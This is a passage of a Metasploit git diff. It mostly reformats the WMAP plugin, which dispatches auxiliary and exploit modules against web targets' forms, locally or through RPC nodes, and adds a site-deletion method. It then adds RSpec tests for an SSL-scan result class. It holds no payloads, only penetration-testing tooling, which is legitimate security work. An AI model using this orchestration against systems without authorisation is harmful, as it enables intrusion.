s.web_sites.find_by_vhost(selected_vhost) w.web_forms.each do |form| - + if self.masstop print_error("STOPPED.") return end - + # # Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn' # @@ -909,18 +917,18 @@ class Plugin::Wmap < Msf::Plugin form.params.each do |p| pn, pv, pt = p if pn - if not pn.empty? + if not pn.empty? if not pv or pv.empty? #TODO add value based on param name pv = "aaa" end - + #temparr << pn.to_s + "=" + Rex::Text.uri_encode(pv.to_s) temparr << pn.to_s + "=" + pv.to_s end else - print_error("Blank parameter name. Form #{form.path}") - end + print_error("Blank parameter name. Form #{form.path}") + end end datastr = temparr.join("&") if (temparr and not temparr.empty?) @@ -935,15 +943,15 @@ class Plugin::Wmap < Msf::Plugin modopts['DATA'] = "" end if form.method.upcase == 'POST' - modopts['DATA'] = datastr + modopts['DATA'] = datastr end modopts['TYPES'] = typestr # # TODO: Add headers, etc. # - if (not usinginipath) or (usinginipath and form.path.match(inipathname)) - + if (not usinginipath) or (usinginipath and form.path.match(inipathname)) + print_status "Path #{form.path}" #print_status("Unique PATH #{modopts['PATH']}") #print_status("Unique GET #{modopts['QUERY']}") @@ -953,7 +961,7 @@ class Plugin::Wmap < Msf::Plugin begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) - end + end utest_query[signature(form.path,datastr)]=1 rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") @@ -982,26 +990,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches2.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -1015,7 +1023,7 @@ class Plugin::Wmap < Msf::Plugin # # Parameters passed in hash xref # - + modopts['RHOST'] = selected_host modopts['RHOSTS'] = selected_host modopts['RPORT'] = selected_port.to_s @@ -1024,7 +1032,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins for each request that have a distinct # GET/POST URI QUERY string. @@ -1035,7 +1043,7 @@ class Plugin::Wmap < Msf::Plugin w = s.web_sites.find_by_vhost(selected_vhost) w.web_forms.each do |req| - + if self.masstop print_error("STOPPED.") return @@ -1049,7 +1057,7 @@ class Plugin::Wmap < Msf::Plugin req.params.each do |p| pn, pv, pt = p if pn - if not pn.empty? + if not pn.empty? if not pv or pv.empty? #TODO add value based on param name pv = "aaa" @@ -1058,8 +1066,8 @@ class Plugin::Wmap < Msf::Plugin temparr << pn.to_s + "=" + pv.to_s end else - print_error("Blank parameter name. Form #{req.path}") - end + print_error("Blank parameter name. Form #{req.path}") + end end datastr = temparr.join("&") if (temparr and not temparr.empty?) @@ -1076,8 +1084,8 @@ class Plugin::Wmap < Msf::Plugin # # TODO: Add method, headers, etc. # - if (not usinginipath) or (usinginipath and req.path.match(inipathname)) - + if (not usinginipath) or (usinginipath and req.path.match(inipathname)) + print_status "Path #{req.path}" #print_status("Query PATH #{modopts['PATH']}") #print_status("Query GET #{modopts['QUERY']}") @@ -1091,14 +1099,14 @@ class Plugin::Wmap < Msf::Plugin rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") end - end + end end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # @@ -1112,27 +1120,27 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches10.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -1146,7 +1154,7 @@ class Plugin::Wmap < Msf::Plugin # # Parameters passed in hash xref # - + modopts['RHOST'] = selected_host modopts['RHOSTS'] = selected_host modopts['RPORT'] = selected_port.to_s @@ -1155,7 +1163,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins that only need to be # launched once. @@ -1167,30 +1175,30 @@ class Plugin::Wmap < Msf::Plugin end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end - + if (mode & wmap_expl != 0) print_line "+" * sizeline - - if not self.runlocal + + if not self.runlocal if execmod rpc_list_nodes() print_status("Note: Use wmap_nodes -l to list node status for completion") end end - + print_line("Launch completed in #{(Time.now.to_f - stamp)} seconds.") print_line "+" * sizeline end - + print_status("Done.") end @@ -1225,10 +1233,29 @@ class Plugin::Wmap < Msf::Plugin print_status tbl.to_s + "\n" end + def delete_site(wmap_index) + print_status("Deleting site #{wmap_index}") + idx = 0 + self.framework.db.hosts.each do |bdhost| + bdhost.services.each do |serv| + serv.web_sites.each do |web| + if idx == wmap_index + web.delete + print_status("Deleted #{web.vhost} on #{bdhost.address} at index #{idx}") + return + else + idx += 1 + end + end + end + end + end + + def view_sites # Clean temporary sites list self.lastsites = [] - + indent = ' ' tbl = Rex::Ui::Text::Table.new( @@ -1253,13 +1280,13 @@ class Plugin::Wmap < Msf::Plugin f = web.web_forms.count tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, serv.name, c.to_s, f.to_s ] idx += 1 - + turl = web.vhost + "," + serv.name + "://" +bdhost.address.to_s + ":" + serv.port.to_s + "/" - self.lastsites << turl + self.lastsites << turl end end end - + print_status tbl.to_s + "\n" end @@ -1317,9 +1344,9 @@ class Plugin::Wmap < Msf::Plugin def process_urls(urlstr) target_whitelist = [] - + urls = urlstr.to_s.split(/\s+/) - + urls.each do |url| next if url.to_s.strip.empty? @@ -1361,8 +1388,8 @@ class Plugin::Wmap < Msf::Plugin if not self.targets # First time targets are defined - self.targets = Hash.new() - end + self.targets = Hash.new() + end target_whitelist.each do |ent| vhost,target = ent @@ -1387,12 +1414,12 @@ class Plugin::Wmap < Msf::Plugin # Initial defaul path inipath = target.path if target.path.empty? - inipath = '/' + inipath = '/' end - + #site.web_forms.find_all_by_path(target.path).each do |form| ckey = [ site.vhost, host.address, serv.port, inipath].join("|") - + if not self.targets[ckey] self.targets[ckey] = WebTarget.new self.targets[ckey].merge!({ @@ -1404,7 +1431,7 @@ class Plugin::Wmap < Msf::Plugin }) #self.targets[ckey][inipath] = [] else - print_status("Target already set in targets list.") + print_status("Target already set in targets list.") end # Store the form object in the hash for this path @@ -1415,23 +1442,23 @@ class Plugin::Wmap < Msf::Plugin end # Code by hdm. Modified two lines by et - # lastsites contains a temporary array with vhost,url strings so the id can be - # referenced in the array and prevent new sites added in the db to corrupt previous id list. + # lastsites contains a temporary array with vhost,url strings so the id can be + # referenced in the array and prevent new sites added in the db to corrupt previous id list. def process_ids(idsstr) - if !self.lastsites or self.lastsites.length == 0 + if !self.lastsites or self.lastsites.length == 0 view_sites print_status ("Web sites ids. referenced from previous table.") end - + target_whitelist = [] ids = idsstr.to_s.split(/,/) ids.each do |id| next if id.to_s.strip.empty? - + if id.to_i > self.lastsites.length - print_error("Skipping id #{id}...") + print_error("Skipping id #{id}...") else target_whitelist << self.lastsites[id.to_i] print_status("Loading #{self.lastsites[id.to_i]}.") @@ -1442,21 +1469,21 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 if not self.targets - self.targets = Hash.new() + self.targets = Hash.new() end target_whitelist.each do |ent| process_urls(ent) - end + end end - + def view_site_tree(urlstr, md, ld) - if not urlstr + if not urlstr return end site_whitelist = [] - + urls = urlstr.to_s.split(/\s+/) urls.each do |url| @@ -1498,7 +1525,7 @@ class Plugin::Wmap < Msf::Plugin # Skip the DB entirely if no matches return if site_whitelist.length == 0 - vsites = Hash.new() + vsites = Hash.new() site_whitelist.each do |ent| vhost,target = ent @@ -1514,7 +1541,7 @@ class Plugin::Wmap < Msf::Plugin next end - sites = serv.web_sites.where('vhost = ? and service_id = ?', vhost, serv.id) + sites = serv.web_sites.where('vhost = ? and service_id = ?', vhost, serv.id) sites.each do |site| t = load_tree(site) @@ -1588,10 +1615,10 @@ class Plugin::Wmap < Msf::Plugin tree.children.each_pair do |name,child| print_tree(child,ip,maxlevel,limitlevel) end - + end end - + def signature(fpath,fquery) hsig = Hash.new() @@ -1617,13 +1644,13 @@ class Plugin::Wmap < Msf::Plugin end params end - + def rpc_add_node(host,port,ssl,user,pass,bypass_exist) if not self.rpcarr - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() end - + begin istr = "#{host}|#{port}|#{ssl}|#{user}|#{pass}" if self.rpcarr.has_key?(istr) and not bypass_exist and self.rpcarr[istr] != nil @@ -1639,37 +1666,37 @@ class Plugin::Wmap < Msf::Plugin print_error "Unable to connect" #raise ConnectionError return - end - + end + res = temprpc.login( user , pass) - - if not res + + if not res print_error("Unable to authenticate to #{host}:#{port}.") return else res = temprpc.call('core.version') end - - print_status("Connected to #{host}:#{port} [#{res['version']}].") + + print_status("Connected to #{host}:#{port} [#{res['version']}].") self.rpcarr[istr] = temprpc end rescue print_error("Unable to connect") end end - + def local_module_exec(mod,mtype, opts, nmaxjobs) jobify = false - + modinst = framework.modules.create(mod) if(not modinst) print_error("Unknown module") return end - + sess = nil - + case mtype when 'auxiliary' Msf::Simple::Auxiliary.run_simple(modinst, { @@ -1693,42 +1720,42 @@ class Plugin::Wmap < Msf::Plugin else print_error("Wrong mtype.") end - + if sess if (jobify == false and sess.interactive?) print_line driver.run_single("sessions -q -i #{sess.sid}") - else + else print_status("Session #{sess.sid} created in the background.") end end end - + def rpc_round_exec(mod,mtype, opts, nmaxjobs) - + res = nil idx = 0 - - if active_rpc_nodes == 0 + + if active_rpc_nodes == 0 if not self.runlocal - print_error("All active nodes not working or removed") - return + print_error("All active nodes not working or removed") + return end res = true else rpc_reconnect_nodes() end - + if self.masstop return end - + while not res if active_rpc_nodes == 0 print_error("All active nodes not working or removed") - return + return end - + #find the node with less jobs load. minjobs = nmaxjobs minconn = nil @@ -1736,15 +1763,15 @@ class Plugin::Wmap < Msf::Plugin self.rpcarr.each do |k,rpccon| if not rpccon print_error("Skipping inactive node #{nid} #{k}") - else + else begin currentjobs = rpccon.call('job.list').length - + if currentjobs < minjobs minconn = rpccon minjobs = currentjobs end - + if currentjobs == nmaxjobs if self.nmaxdisplay == false print_error("Node #{nid} reached max number of jobs #{nmaxjobs}") @@ -1756,57 +1783,57 @@ class Plugin::Wmap < Msf::Plugin rescue print_error("Unable to connect. Node #{tarr[0]}:#{tarr[1]}") self.rpcarr[k]=nil - - if active_rpc_nodes == 0 + + if active_rpc_nodes == 0 print_error("All active nodes ,not working or removed") return else - print_error("Sending job to next node") + print_error("Sending job to next node") next - end + end end end - nid += 1 + nid += 1 end if minjobs < nmaxjobs res=minconn.call('module.execute', mtype, mod, opts) self.nmaxdisplay = false #print_status(">>>#{res} #{mod}") - + if res if res.has_key?("job_id") return else - print_error("Unable to execute module in node #{k} #{res}") + print_error("Unable to execute module in node #{k} #{res}") end end else - #print_status("Max number of jobs #{nmaxjobs} reached in node #{k}") + #print_status("Max number of jobs #{nmaxjobs} reached in node #{k}") end - + idx += 1 end - - if self.runlocal and not self.masstop + + if self.runlocal and not self.masstop local_module_exec(mod,mtype, opts, nmaxjobs) end end - + def rpc_db_nodes(host,port,user,pass,name) - rpc_reconnect_nodes() - + rpc_reconnect_nodes() + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - - self.rpcarr.each do |k,v| + + self.rpcarr.each do |k,v| if v res = v.call('db.driver',{:driver => 'postgresql'}) res = v.call('db.connect',{:database => name, :host => host, :port => port, :username => user, :password => pass}) res = v.call('db.status') - + if res['db'] == name print_status("db_connect #{res} #{host}:#{port} OK") else @@ -1814,14 +1841,14 @@ class Plugin::Wmap < Msf::Plugin end else print_error("No connection to node #{k}") - end + end end end - + def rpc_reconnect_nodes() begin # Sucky 5 mins token timeout. - + idx = nil self.rpcarr.each do |k,rpccon| if rpccon @@ -1830,11 +1857,11 @@ class Plugin::Wmap < Msf::Plugin currentjobs = rpccon.call('job.list').length rescue tarr = k.split("|") - rflag = false - + rflag = false + res = rpccon.login(tarr[3],tarr[4]) - - if res + + if res rflag = true print_error("Reauth to node #{tarr[0]}:#{tarr[1]}") break @@ -1842,7 +1869,7 @@ class Plugin::Wmap < Msf::Plugin raise ConnectionError end end - end + end end rescue print_error("ERROR CONNECTING TO NODE. Disabling #{idx} use wmap_nodes -a to reconnect") @@ -1853,31 +1880,31 @@ class Plugin::Wmap < Msf::Plugin else #blah end - end + end end - + def rpc_kill_node(i,j) - + if not i print_error("Nodes not defined") return end - + if not j print_error("Node jobs defined") return end - + rpc_reconnect_nodes() - + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - + idx=0 self.rpcarr.each do |k,rpccon| - if idx == i.to_i or i.upcase == 'ALL' + if idx == i.to_i or i.upcase == 'ALL' #begin if not rpccon print_error("No connection to node #{idx}") @@ -1887,39 +1914,39 @@ class Plugin::Wmap < Msf::Plugin if j==id.to_s or j.upcase == 'ALL' rpccon.call('job.stop',id) print_status("Node #{idx} Killed job id #{id} #{name}") - end + end end - end + end #rescue # print_error("No connection") #end end - idx += 1 + idx += 1 end end - + def rpc_view_jobs() indent = ' ' - + rpc_reconnect_nodes() - + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - + idx=0 - self.rpcarr.each do |k,rpccon| + self.rpcarr.each do |k,rpccon| if not rpccon print_status("[Node ##{idx}: #{k} DISABLED/NO CONNECTION]") else - - arrk = k.split('|') + + arrk = k.split('|') print_status("[Node ##{idx}: #{arrk[0]} Port:#{arrk[1]} SSL:#{arrk[2]} User:#{arrk[3]}]") - + begin n = rpccon.call('job.list') - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Jobs', @@ -1930,71 +1957,71 @@ class Plugin::Wmap < Msf::Plugin 'Target', 'PATH', ]) - + n.each do |id,name| - jinfo = rpccon.call('job.info',id) + jinfo = rpccon.call('job.info',id) dstore = jinfo['datastore'] tbl << [ id.to_s, name,dstore['VHOST']+":"+dstore['RPORT'],dstore['PATH']] end - + print_status tbl.to_s + "\n" - + rescue print_status("[Node ##{idx} #{k} DISABLED/NO CONNECTION]") end - end - idx += 1 - end + end + idx += 1 + end end - - + + # Modified from http://stackoverflow.com/questions/946738/detect-key-press-non-blocking-w-o-getc-gets-in-ruby - def quit? - begin - while c = driver.input.read_nonblock(1) - print_status("Quited") - return true if c == 'Q' - end - false - rescue Errno::EINTR - false - rescue Errno::EAGAIN - false - rescue EOFError - true - end - end - + def quit? + begin + while c = driver.input.read_nonblock(1) + print_status("Quited") + return true if c == 'Q' + end + false + rescue Errno::EINTR + false + rescue Errno::EAGAIN + false + rescue EOFError + true + end + end + def rpc_mon_nodes() # Pretty monitor - + color = self.opts["ConsoleDriver"].output.supports_color? rescue false - - colors = [ - '%grn', - '%blu', - '%yel', - '%whi' - ] - + + colors = [ + '%grn', + '%blu', + '%yel', + '%whi' + ] + #begin loop do rpc_reconnect_nodes() - + idx = 0 - self.rpcarr.each do |k,rpccon| - + self.rpcarr.each do |k,rpccon| + arrk = k.split('|') - + v = "NOCONN" n = 1 c = '%red' - - if not rpccon + + if not rpccon v = "NOCONN" n = 1 c = '%red' - else + else begin v = "" c = '%blu' @@ -2002,7 +2029,7 @@ class Plugin::Wmap < Msf::Plugin v = "ERROR" c = '%red' end - + begin n = rpccon.call('job.list').length c = '%blu' @@ -2011,8 +2038,8 @@ class Plugin::Wmap < Msf::Plugin v = "NOCONN" c = '%red' end - end - + end + #begin if not @stdio @stdio = Rex::Ui::Text::Output::Stdio.new @@ -2025,7 +2052,7 @@ class Plugin::Wmap < Msf::Plugin end msg = "[#{idx}] #{"%bld#{c}||%clr"*n} #{n} #{v}\n" @stdio.print_raw(@stdio.substitute_colors(msg)) - + #rescue #blah #end @@ -2036,8 +2063,8 @@ class Plugin::Wmap < Msf::Plugin #rescue # print_status("End.") #end - end - + end + def rpc_list_nodes() indent = ' ' @@ -2055,56 +2082,56 @@ class Plugin::Wmap < Msf::Plugin 'Status', '#jobs', ]) - + idx=0 - + rpc_reconnect_nodes() - - self.rpcarr.each do |k,rpccon| - + + self.rpcarr.each do |k,rpccon| + arrk = k.split('|') - + if not rpccon v = "NOCONN" n = "" - else + else begin v = rpccon.call('core.version')['version'] rescue v = "ERROR" end - + begin n = rpccon.call('job.list').length rescue n = "" end - end - + end + tbl << [ idx.to_s, arrk[0], arrk[1], arrk[2], arrk[3], arrk[4], v, n] idx += 1 end - + print_status tbl.to_s + "\n" end - + def active_rpc_nodes - if self.rpcarr.length == 0 + if self.rpcarr.length == 0 return 0 else - idx = 0 + idx = 0 self.rpcarr.each do |k,conn| if conn - idx += 1 + idx += 1 end end return idx - end + end end - + def view_modules indent = ' ' - + wmaptype = [:wmap_ssl, :wmap_server, :wmap_dir, @@ -2113,11 +2140,11 @@ class Plugin::Wmap < Msf::Plugin :wmap_query, :wmap_generic ] - + if not self.wmapmodules load_wmap_modules(true) end - + wmaptype.each do |modt| tbl = Rex::Ui::Text::Table.new( @@ -2128,53 +2155,53 @@ class Plugin::Wmap < Msf::Plugin 'Name', 'OrderID', ]) - - idx = 0 + + idx = 0 self.wmapmodules.each do |w| oid = w[3] if w[3] == 0xFFFFFF oid = ":last" end - - if w[2] == modt + + if w[2] == modt tbl << [w[0],oid] idx += 1 end - end - + end + print_status tbl.to_s + "\n" end end - + # Yes sorting hashes dont make sense but actually it does when you are enumerating one. And # sort_by of a hash returns an array so this is the reason for this ugly piece of code def sort_by_orderid(m) - temphash=Hash.new() + temphash=Hash.new() temparr=[] - - temparr = m.sort_by do |xref,v| - xref[3] + + temparr = m.sort_by do |xref,v| + xref[3] end - + temparr.each do |b| - temphash[b[0]] = b[1] + temphash[b[0]] = b[1] end temphash end - + # Load all wmap modules def load_wmap_modules(reload) if reload or not self.wmapmodules print_status("Loading wmap modules...") - + self.wmapmodules=[] - + idx = 0 [ [ framework.auxiliary, 'auxiliary' ], [framework.exploits, 'exploit' ] ].each do |mtype| # Scan all exploit modules for matching references mtype[0].each_module do |n,m| e = m.new - + # Only include wmap_enabled plugins if e.respond_to?("wmap_enabled") penabled = e.wmap_enabled @@ -2187,19 +2214,19 @@ class Plugin::Wmap < Msf::Plugin end end print_status("#{idx} wmap enabled modules loaded.") - end + end end - + def view_vulns framework.db.hosts.each do |host| - host.services.each do |serv| + host.services.each do |serv| serv.web_sites.each do |site| site.web_vulns.each do |wv| print_status("+ [#{host.address}] (#{site.vhost}): #{wv.category} #{wv.path}") print_status("\t#{wv.name} #{wv.description}") print_status("\t#{wv.method} #{wv.proof}") end - end + end end end end @@ -2211,20 +2238,20 @@ class Plugin::Wmap < Msf::Plugin "#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}" end end - + def initialize(framework, opts) super color = self.opts["ConsoleDriver"].output.supports_color? rescue false - + wmapversion = '1.5.1' - + wmapbanner = "%red\n.-.-.-..-.-.-..---..---.%clr\n" wmapbanner += "%red| | | || | | || | || |-'%clr\n" - wmapbanner += "%red`-----'`-'-'-'`-^-'`-'%clr\n" + wmapbanner += "%red`-----'`-'-'-'`-^-'`-'%clr\n" wmapbanner += "[WMAP #{wmapversion}] === et [ ] metasploit.com 2012\n" - + if not @stdio @stdio = Rex::Ui::Text::Output::Stdio.new end @@ -2234,7 +2261,7 @@ class Plugin::Wmap < Msf::Plugin else @stdio.disable_color end - + @stdio.print_raw(@stdio.substitute_colors(wmapbanner)) add_console_dispatcher(WmapCommandDispatcher) diff --git a/spec/lib/rex/sslscan/result_spec.rb b/spec/lib/rex/sslscan/result_spec.rb new file mode 100644 index 0000000000..bb9e667c4e --- /dev/null +++ b/spec/lib/rex/sslscan/result_spec.rb @@ -0,0 +1,526 @@ +require 'rex/sslscan/result' + +describe Rex::SSLScan::Result do + + subject{Rex::SSLScan::Result.new} + + it { should respond_to :accepted } + it { should respond_to :cert } + it { should respond_to :ciphers } + it { should respond_to :rejected } + it { should respond_to :sslv2 } + it { should respond_to :sslv3 } + it { should respond_to :standards_compliant? } + it { should respond_to :strong_ciphers } + it { should respond_to :supports_ssl? } + it { should respond_to :supports_sslv2? } + it { should respond_to :supports_sslv3? } + it { should respond_to :supports_tlsv1? } + it { should respond_to :supports_weak_ciphers? } + it { should respond_to :tlsv1 } + it { should respond_to :weak_ciphers } + + context "with no values set" do + it "should return nil for the cert" do + subject.cert.should == nil + end + + it "should return an empty set for ciphers" do + subject.ciphers.should be_empty + end + + it "should return an empty array for accepted" do + subject.accepted.should == [] + end + + it "should return an empty array for rejected" do + subject.rejected.should == [] + end + + it "should return an empty array for #sslv2" do + subject.sslv2.should == [] + end + + it "should return an empty array for #sslv3" do + subject.sslv3.should == [] + end + + it "should return an empty array for #tlsv1" do + subject.tlsv1.should == [] + end + + it "should return an empty array for #weak_ciphers" do + subject.weak_ciphers.should == [] + end + + it "should return an empty array for #strong_ciphers" do + subject.strong_ciphers.should == [] + end + + it "should return false for #supports_ssl?" do + subject.supports_ssl?.should == false + end + + it "should return false for #supports_ssl?v2" do + subject.supports_sslv2?.should == false + end + + it "should return false for #supports_sslv3?" do + subject.supports_sslv3?.should == false + end + + it "should return false for #supports_tlsv1?" do + subject.supports_tlsv1?.should == false + end + + it "should return false for #supports_weak_ciphers?" do + subject.supports_weak_ciphers?.should == false + end + + it "should return true for #standards_compliant?" do + subject.standards_compliant?.should == true + end + end + + context "setting the cert" do + it "should accept nil" do + subject.cert = nil + subject.cert.should == nil + end + + it "should accept an X509 cert" do + cert = OpenSSL::X509::Certificate.new + subject.cert = cert + subject.cert.should == cert + end + + it "should raise an exception for anything else" do + expect{subject.cert = "foo"}.to raise_error + end + end + + context "adding a cipher result" do + context "should raise an exception if" do + it "given an invalid SSL version" do + expect{subject.add_cipher(:ssl3, 'AES256-SHA', 256, :accepted )}.to raise_error + end + + it "given SSL version as a string" do + expect{subject.add_cipher('sslv3', 'AES256-SHA', 256, :accepted )}.to raise_error + end + + it "given an invalid SSL cipher" do + expect{subject.add_cipher(:SSLv3, 'FOO256-SHA', 256, :accepted )}.to raise_error + end + + it "given an unsupported cipher for the version" do + expect{subject.add_cipher(:SSLv3, 'DES-CBC3-MD5', 256, :accepted )}.to raise_error + end + + it "given a non-number for key length" do + expect{subject.add_cipher(:SSLv3, 'AES256-SHA', "256", :accepted )}.to raise_error + end + + it "given a decimal key length" do + expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 25.6, :accepted )}.to raise_error + end + + it "given an invalid status" do + expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 256, :good )}.to raise_error + end + + it "given status as a string" do + expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 256, "accepted" )}.to raise_error + end + end + context "that was accepted" do + it "should add an SSLv2 cipher result to the SSLv2 Accepted array or generate an SSLv2 exception" do + begin + subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted) + subject.accepted(:SSLv2).should include({ + :version => :SSLv2, + :cipher=>"DES-CBC3-MD5", + :key_length=>168, + :weak=> false, + :status => :accepted}) + rescue ArgumentError => e + e.message.should == "unknown SSL method `SSLv2'." + end + end + + it "should add an SSLv3 cipher result to the SSLv3 Accepted array" do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.accepted(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :accepted}) + end + + it "should add an TLSv1 cipher result to the TLSv1 Accepted array" do + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.accepted(:TLSv1).should include({ + :version => :TLSv1, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :accepted}) + end + + it "should successfully add multiple entries in a row" do + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.accepted(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :accepted}) + subject.accepted(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :accepted}) + end + + it "should not add duplicate entries" do + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + subject.accepted(:SSLv3).count.should == 1 + end + end + context "that was rejected" do + it "should add an SSLv2 cipher result to the SSLv2 Rejected array or generate an SSLv2 exception" do + begin + subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :rejected) + subject.rejected(:SSLv2).should include({ + :version => :SSLv2, + :cipher=>"DES-CBC3-MD5", + :key_length=>168, + :weak=> false, + :status => :rejected}) + rescue ArgumentError => e + e.message.should == "unknown SSL method `SSLv2'." + end + end + + it "should add an SSLv3 cipher result to the SSLv3 Rejected array" do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected) + subject.rejected(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :rejected}) + end + + it "should add an TLSv1 cipher result to the TLSv1 Rejected array" do + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :rejected) + subject.rejected(:TLSv1).should include({ + :version => :TLSv1, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :rejected}) + end + + it "should successfully add multiple entries in a row" do + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected) + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected) + subject.rejected(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES256-SHA", + :key_length=>256, + :weak=> false, + :status => :rejected}) + subject.rejected(:SSLv3).should include({ + :version => :SSLv3, + :cipher=>"AES128-SHA", + :key_length=>128, + :weak=> false, + :status => :rejected}) + end + + it "should not add duplicate entries" do + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected) + subject.rejected(:SSLv3).count.should == 1 + end + end + end + + context "enumerating all accepted ciphers" do + before(:each) do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted) + end + + context "with no version selected" do + it "should return an array of cipher detail hashes" do + subject.each_accepted do |cipher_details| + cipher_details.should include(:version, :cipher, :key_length, :status, :weak) + end + end + + it "should return all of the accepted cipher details" do + count = 0 + subject.each_accepted do |cipher_details| + count = count+1 + end + count.should == 3 + end + end + + context "when specifying one SSL version" do + it "should raise an exception if not given a symbol" do + expect{ subject.each_accepted('sslv2')}.to raise_error + end + + it "should raise an exception if given an invalid SSL version" do + expect{ subject.each_accepted(:TLSv3)}.to raise_error + end + + it "should return only ciphers matching the version" do + subject.each_accepted(:SSLv3) do |cipher_details| + cipher_details[:version].should == :SSLv3 + end + end + end + + context "when specifying multiple SSL Versions in an array" do + it "should return all versions if no valid versions were supplied" do + count = 0 + subject.each_accepted([:TLSv3, :TLSv4]) do |cipher_details| + count = count+1 + end + count.should == 3 + end + + it "should return only the ciphers for the specified version" do + subject.each_accepted([:SSLv3,:TLSv1]) do |cipher_details| + cipher_details[:version].should_not == :SSLv2 + end + end + end + end + + context "enumerating all rejected ciphers" do + before(:each) do + subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected) + subject.add_cipher(:TLSv1, "AES256-SHA", 256, :rejected) + subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected) + end + + context "with no version selected" do + it "should return an array of cipher detail hashes" do + subject.each_rejected do |cipher_details| + cipher_details.should include(:version, :cipher, :key_length, :status, :weak) + end + end + + it "should return all of the rejected cipher details" do + count = 0 + subject.each_rejected do |cipher_details| + count = count+1 + end + count.should == 3 + end + end + + context "when specifying one SSL version" do + it "should raise an exception if not given a symbol" do + expect{ subject.each_rejected('sslv2')}.to raise_error + end + + it "should raise an exception if given an invalid SSL version" do + expect{ subject.each_rejected(:TLSv3)}.to raise_error + end + + it "should return only ciphers matching the version" do + subject.each_rejected(:SSLv3) do |cipher_details| + cipher_details[:version].should == :SSLv3 + end + end + end + + context "when specifying multiple SSL Versions in an array" do + it "should return all versions if no valid versions were supplied" do + count = 0 + subject.each_rejected([:TLSv3, :TLSv4]) do |cipher_details| + count = count+1 + end + count.should == 3 + end + + it "should return only the ciphers for the specified version" do + subject.each_rejected([:SSLv3,:TLSv1]) do |cipher_details| + cipher_details[:version].should_not == :SSLv2 + end + end + end + end + + context "checking SSL support" do + context "for SSLv2" do + it "should return false if there are no accepted ciphers" do + subject.supports_sslv2?.should == false + end + it "should return true if there are accepted ciphers or raise an SSLv2 exception" do + begin + subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted) + subject.supports_sslv2?.should == true + rescue ArgumentError => e + e.message.should == "unknown SSL method `SSLv2'." + end + end + end + context "for SSLv3" do + it "should return false if there are no 